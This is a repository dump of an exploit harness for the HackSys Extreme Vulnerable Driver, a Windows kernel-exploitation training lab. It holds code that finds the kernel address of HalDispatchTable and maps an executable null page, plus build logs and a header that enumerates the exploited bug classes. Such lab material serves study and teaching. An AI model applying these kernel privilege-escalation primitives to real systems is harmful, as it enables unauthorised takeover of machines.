        exit(EXIT_FAILURE);
    }

    // Size probe: only ReturnLength is used from this call; NtStatus is overwritten below.
    NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);

    // Allocate the Heap chunk sized by the probe.
    pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
                                                                      HEAP_ZERO_MEMORY,
                                                                      ReturnLength);

    if (!pSystemModuleInformation) {
        DEBUG_ERROR("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    NtStatus = NtQuerySystemInformation(SystemModuleInformation,
                                        pSystemModuleInformation,
                                        ReturnLength,
                                        &ReturnLength);

    if (NtStatus != STATUS_SUCCESS) {
        // A direct Nt* call does not set the Win32 last error; NtStatus is
        // the value worth logging here.
        DEBUG_ERROR("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    // Module[0] is taken to be the kernel image; only its base and file name are used.
    KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;
    KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1;

    DEBUG_INFO("\t\t\t[+] Loaded Kernel: %s\n", KernelImage);
    DEBUG_INFO("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode);

    // Loads the kernel's on-disk image as an ordinary DLL so its exports can be resolved.
    hKernelInUserMode = LoadLibraryA(KernelImage);

    if (!hKernelInUserMode) {
        DEBUG_ERROR("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    // This is still the user-mode copy's address of the export.
    HalDispatchTable = (PVOID)GetProcAddress(hKernelInUserMode, "HalDispatchTable");

    if (!HalDispatchTable) {
        DEBUG_ERROR("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    else {
        // Convert to an RVA relative to the user-mode load address ...
        HalDispatchTable = (PVOID)((ULONG)HalDispatchTable - (ULONG)hKernelInUserMode);

        // ... then rebase that RVA onto the kernel base reported by the module query.
        HalDispatchTable = (PVOID)((ULONG)HalDispatchTable + (ULONG)KernelBaseAddressInKernelMode);

        DEBUG_INFO("\t\t\t[+] HalDispatchTable: 0x%p\n", HalDispatchTable);
    }

    HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);

    // Both handles are non-NULL here (the NULL cases exited above); the
    // guards are harmless but redundant.
    if (hNtDll) {
        FreeLibrary(hNtDll);
    }

    if (hKernelInUserMode) {
        FreeLibrary(hKernelInUserMode);
    }

    hNtDll = NULL;
    hKernelInUserMode = NULL;
    pSystemModuleInformation = NULL;

    return HalDispatchTable;
}
263 |
/*
 * Commits a page at virtual address 0 in the current process through
 * NtAllocateVirtualMemory, with BaseAddress = 1 (rounded down to page 0,
 * per the author's note) and RegionSize = 0x1000 (rounded up, per the note).
 *
 * Returns TRUE; there is no FALSE path, because every failure calls
 * exit(EXIT_FAILURE) after logging.
 *
 * NOTE(review): hNtdll from GetModuleHandle is not checked for NULL before
 * it is handed to GetProcAddress.
 * NOTE(review): GetModuleHandle does not take a reference on the module, so
 * the FreeLibrary(hNtdll) at the end releases a reference this function
 * never acquired; dropping that call would be the correct pairing.
 * NOTE(review): (HANDLE)0xFFFFFFFF is the current-process pseudo-handle on
 * 32-bit only; GetCurrentProcess() is the portable spelling.
 */
BOOL MapNullPage() {
    HMODULE hNtdll;
    SIZE_T RegionSize = 0x1000; // will be rounded up to the next host
                                // page size address boundary -> 0x2000

    PVOID BaseAddress = (PVOID)0x00000001; // will be rounded down to the next host
                                           // page size address boundary -> 0x00000000
    NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;

    // ntdll is already loaded in every process, so a module handle lookup
    // suffices (no LoadLibrary here, unlike GetHalDispatchTable).
    hNtdll = GetModuleHandle("ntdll.dll");

    // Grab the address of NtAllocateVirtualMemory into the file-scope pointer.
    NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");

    if (!NtAllocateVirtualMemory) {
        DEBUG_ERROR("\t\t[-] Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    // Allocate the virtual memory. BaseAddress and RegionSize are in/out:
    // on return they hold the rounded values that were actually mapped.
    NtStatus = NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
                                       &BaseAddress,
                                       0,
                                       &RegionSize,
                                       MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
                                       PAGE_EXECUTE_READWRITE);

    if (NtStatus != STATUS_SUCCESS) {
        DEBUG_ERROR("\t\t\t\t[-] Virtual Memory Allocation Failed: 0x%x\n", NtStatus);
        exit(EXIT_FAILURE);
    }
    else {
        DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", BaseAddress);
        DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", RegionSize);
    }

    // See NOTE(review) in the header: this pairs with a GetModuleHandle, not a LoadLibrary.
    FreeLibrary(hNtdll);

    return TRUE;
}
304 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/ArbitraryOverwrite.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/ArbitraryOverwrite.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Common.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Common.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.exe
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.ilk
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Debug|Win32|C:\HackSysExtremeVulnerableDriver\Exploit\Source\|
3 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.log:
--------------------------------------------------------------------------------
1 | Build started 1/22/2017 11:36:08 AM.
2 | Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" on node 2 (build target(s)).
3 | InitializeBuildStatus:
4 | Creating "Debug\HackSysEVDExploit.unsuccessfulbuild" because "AlwaysCreate" was specified.
5 | ClCompile:
6 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\CL.exe /c /ZI /nologo /W3 /WX- /Od /Oy- /D _MBCS /Gm /EHsc /RTC1 /MDd /GS /fp:precise /Zc:wchar_t /Zc:forScope /Fo"Debug\\" /Fd"Debug\vc100.pdb" /Gd /TC /analyze- /errorReport:prompt ArbitraryOverwrite.c Common.c HackSysEVDExploit.c IntegerOverflow.c NullPointerDereference.c PoolOverflow.c Payloads.c StackOverflow.c StackOverflowGS.c TypeConfusion.c UninitializedHeapVariable.c UninitializedStackVariable.c UseAfterFree.c
7 | UseAfterFree.c
8 | UninitializedStackVariable.c
9 | UninitializedHeapVariable.c
10 | TypeConfusion.c
11 | StackOverflowGS.c
12 | StackOverflow.c
13 | Payloads.c
14 | PoolOverflow.c
15 | NullPointerDereference.c
16 | IntegerOverflow.c
17 | HackSysEVDExploit.c
18 | Common.c
19 | ArbitraryOverwrite.c
20 | Generating Code...
21 | Link:
22 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\link.exe /ERRORREPORT:PROMPT /OUT:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.exe" /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"Debug\HackSysEVDExploit.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.pdb" /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.lib" /MACHINE:X86 Debug\ArbitraryOverwrite.obj
23 | Debug\Common.obj
24 | Debug\HackSysEVDExploit.obj
25 | Debug\IntegerOverflow.obj
26 | Debug\NullPointerDereference.obj
27 | Debug\PoolOverflow.obj
28 | Debug\Payloads.obj
29 | Debug\StackOverflow.obj
30 | Debug\StackOverflowGS.obj
31 | Debug\TypeConfusion.obj
32 | Debug\UninitializedHeapVariable.obj
33 | Debug\UninitializedStackVariable.obj
34 | Debug\UseAfterFree.obj
35 | HackSysEVDExploit.vcxproj -> C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.exe
36 | Manifest:
37 | C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\mt.exe /nologo /verbose /outputresource:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.exe;#1" /manifest Debug\HackSysEVDExploit.exe.intermediate.manifest
38 | FinalizeBuildStatus:
39 | Deleting file "Debug\HackSysEVDExploit.unsuccessfulbuild".
40 | Touching "Debug\HackSysEVDExploit.lastbuildstate".
41 | Done Building Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" (build target(s)).
42 |
43 | Build succeeded.
44 |
45 | Time Elapsed 00:00:03.15
46 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/IntegerOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/IntegerOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/NullPointerDereference.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/NullPointerDereference.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Payloads.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Payloads.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/PoolOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/PoolOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflowGS.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflowGS.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/TypeConfusion.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/TypeConfusion.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedHeapVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedHeapVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedStackVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedStackVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UseAfterFree.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UseAfterFree.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.idb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | HackSysEVDExploit.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | main exploit module handling the exploitation routines.
47 |
48 | --*/
49 |
50 | #ifndef __EXPLOIT_H__
51 | #define __EXPLOIT_H__
52 |
53 | #pragma once
54 |
55 | #include "arg.h"
56 | #include "Common.h"
57 |
/*
 * Selects which HEVD module the harness drives. The enumerators take their values from
 * declaration order (PoolOverflow == 0 ... UninitializedStackVariable == 9); each name
 * mirrors one object/module of the same name in this tree (see the Debug\*.obj list in
 * the build log: ArbitraryOverwrite, IntegerOverflow, NullPointerDereference, ...).
 *
 * NOTE(review): the enumerators are unprefixed names in the global namespace, so they
 * can clash with any function or macro that reuses a module name (e.g. `PoolOverflow`);
 * confirm nothing else in the project declares these identifiers.
 */
typedef enum _VULNERABILITY_TYPE {
    PoolOverflow,                 /* 0 */
    UseAfterFree,                 /* 1 */
    TypeConfusion,                /* 2 */
    StackOverflow,                /* 3 */
    IntegerOverflow,              /* 4 */
    StackOverflowGS,              /* 5 */
    ArbitraryOverwrite,           /* 6 */
    NullPointerDereference,       /* 7 */
    UninitializedHeapVariable,    /* 8 */
    UninitializedStackVariable    /* 9 */
} VULNERABILITY_TYPE, *PVULNERABILITY_TYPE;
70 |
/*
 * One entry of the command-line keyword -> vulnerability mapping.
 *   Command           - keyword the user supplies (TCHAR string; the project residue
 *                       shows `MultiByte`, so TCHAR is presumably char here — confirm).
 *   VulnerabilityType - the VULNERABILITY_TYPE that Exploit() acts on for that keyword.
 *
 * NOTE(review): the table of these entries and the comparison against argv are not in
 * this header — confirm in HackSysEVDExploit.c whether the match is exact and case-sensitive.
 */
typedef struct _EXPLOIT_VULNERABILITY {
    PTCHAR Command;
    VULNERABILITY_TYPE VulnerabilityType;
} EXPLOIT_VULNERABILITY, *PEXPLOIT_VULNERABILITY;
75 |
/* Prints the command-line help. Process is presumably argv[0] — confirm in the .c file.
 * NOTE(review): a `static` function declared in a header gives every translation unit
 * that includes it a file-local declaration that only one TU ever defines; compilers
 * warn about the undefined ones. This prototype belongs in HackSysEVDExploit.c. */
static VOID ShowUsage(PTCHAR Process);
/* Reports whether the named process runs with elevated privilege — definition not visible
 * here; presumably used to verify the result of a run. Note it takes an ANSI name (LPCSTR)
 * while Command above is PTCHAR. */
BOOL IsProcessHavingHigherPrivilege(LPCSTR TargetProcess);
/* Presumably dispatches on ExploitVulnerability->VulnerabilityType and starts the matching
 * worker routine via LaunchExploitThread — confirm against the definition. */
VOID Exploit(PEXPLOIT_VULNERABILITY ExploitVulnerability);
/* Runs one per-module worker routine (e.g. IntegerOverflowThread from IntegerOverflow.h,
 * NullPointerDereferenceThread from NullPointerDereference.h) on a new thread. Those routines
 * call exit() on failure instead of returning an error, so returning from here does not
 * by itself indicate success. */
VOID LaunchExploitThread(LPTHREAD_START_ROUTINE ExploitHandlerThread);
80 |
81 | #endif //__EXPLOIT_H__
82 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.sdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.sdf
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HackSysEVDExploit", "HackSysEVDExploit.vcxproj", "{A432D8CD-BCEA-49B5-81EE-20B926D7421A}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.Build.0 = Debug|Win32
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.ActiveCfg = Release|Win32
15 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.suo
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}
15 | HackSysEVDExploit
16 | HackSysEVDExploit
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | Level3
44 | Disabled
45 |
46 |
47 | true
48 |
49 |
50 |
51 |
52 | Level3
53 | MaxSpeed
54 | true
55 | true
56 |
57 |
58 | true
59 | true
60 | true
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | Source Files
29 |
30 |
31 | Source Files
32 |
33 |
34 | Source Files
35 |
36 |
37 | Source Files
38 |
39 |
40 | Source Files
41 |
42 |
43 | Source Files
44 |
45 |
46 | Source Files
47 |
48 |
49 | Source Files
50 |
51 |
52 | Source Files
53 |
54 |
55 | Source Files
56 |
57 |
58 |
59 |
60 | Header Files
61 |
62 |
63 | Header Files
64 |
65 |
66 | Header Files
67 |
68 |
69 | Header Files
70 |
71 |
72 | Header Files
73 |
74 |
75 | Header Files
76 |
77 |
78 | Header Files
79 |
80 |
81 | Header Files
82 |
83 |
84 | Header Files
85 |
86 |
87 | Header Files
88 |
89 |
90 | Header Files
91 |
92 |
93 | Header Files
94 |
95 |
96 | Header Files
97 |
98 |
99 | Header Files
100 |
101 |
102 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/IntegerOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
